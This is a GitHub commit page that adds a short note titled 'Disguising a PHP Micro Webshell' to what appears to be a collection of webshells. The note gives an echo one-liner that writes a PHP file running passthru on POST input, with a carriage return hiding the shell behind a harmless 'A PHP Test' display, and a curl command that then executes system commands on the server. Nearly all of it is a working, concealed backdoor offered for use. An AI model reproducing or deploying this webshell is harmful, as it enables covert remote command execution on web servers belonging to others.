Skip to content

Commit

Permalink
Create 2015-09-12.php
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Sep 12, 2015
1 parent fca1830 commit 2b600b7
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions php/tw/2015-09-12.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
Disguising a PHP Micro Webshell

` echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > test.php`
url : http://t.co/YFm6QlpK0k
vist browser page show `A PHP Test`
then in console
`curl -d 1=id http://www.xxx.xx/xx.php`

it like in console show command `id`

0 comments on commit 2b600b7

Please sign in to comment.